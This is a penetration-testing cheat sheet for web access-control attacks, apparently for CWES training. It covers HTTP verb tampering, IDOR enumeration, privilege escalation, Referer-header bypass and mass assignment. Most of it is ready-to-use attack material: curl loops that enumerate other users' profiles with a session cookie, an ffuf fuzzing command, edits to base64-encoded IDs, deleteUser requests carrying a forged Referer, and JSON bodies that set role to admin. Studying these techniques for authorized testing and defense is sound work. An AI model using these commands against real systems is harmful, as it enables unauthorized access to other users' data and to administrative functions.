KagisoSec_
Web
WEB

Web Attacks (IDOR / Verb Tampering / BFLA)

Access-control attacks from the CWES path: HTTP verb tampering, IDOR enumeration (including encoded IDs), and broken function-level authorization / mass assignment. Every payload separated.

web idor bfla access-control cwes

HTTP verb tampering

Try HEAD instead of GET (may bypass auth):

curl -X HEAD http://IP/admin/

Try PUT (may allow file creation):

curl -X PUT http://IP/admin/

Bypass a POST-only filter by switching to GET:

curl -X GET http://IP/process.php -d "cmd=ls"

Enumerate accepted verbs:

for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do code=$(curl -s -o /dev/null -w "%{http_code}" -X $method http://TARGET/admin/resource); echo "$method: $code"; done

IDOR enumeration

Manual - iterate IDs and grep for output:

for i in {1..20}; do curl -s -b "PHPSESSID=SESSION" http://IP/profile.php?id=$i | grep "name:"; done

ffuf automation (find IDs that return 200):

ffuf -w ids.txt -u "http://TARGET/api/users/FUZZ/profile" -H "Cookie: session=YOUR_SESSION" -fc 404,403

Encoded ID - decode, modify, re-encode:

echo -n 'dXNlcjEudHh0' | base64 -d
echo -n 'user2.txt' | base64

Access control models

Understanding the intended model helps spot where it breaks:

ModelDescriptionCommon flaw
DAC (Discretionary)Owner grants access per resourceIDOR — resource IDs not validated per user
MAC (Mandatory)System enforces labels (top secret, public)Rarely web-app relevant
RBAC (Role-Based)Role determines access (admin, user, viewer)Role parameter trusted from client; horizontal priv esc
ABAC (Attribute-Based)Access based on user/resource attributesAttribute injection via request body

Horizontal privilege escalation

Accessing another user’s resources at the same privilege level. Test by changing a user ID, username, or GUID to another user’s:

GET /api/profile?userId=1337     ← your ID
GET /api/profile?userId=1338     ← someone else's
GET /account/orders/ORDER-001    ← yours
GET /account/orders/ORDER-002    ← another user's order

Vertical privilege escalation

Accessing functionality above your privilege level:

GET /admin/users               ← as a regular user
POST /admin/deleteUser?id=5

Try common admin paths with a low-privilege session in Burp Repeater.

Referer-based access control bypass

If the admin page checks that the Referer is /admin/main:

GET /admin/deleteUser?username=carlos HTTP/1.1
Referer: https://TARGET/admin/main

BFLA / mass assignment

Access admin endpoints directly with a regular-user token:

GET  /admin/users
POST /api/admin/deleteUser

Role escalation via request body - add privileged fields:

{"role": "admin"}
{"isAdmin": true}

Mass assignment via PATCH:

PATCH /api/users/123
{"email": "new@test.com", "role": "admin"}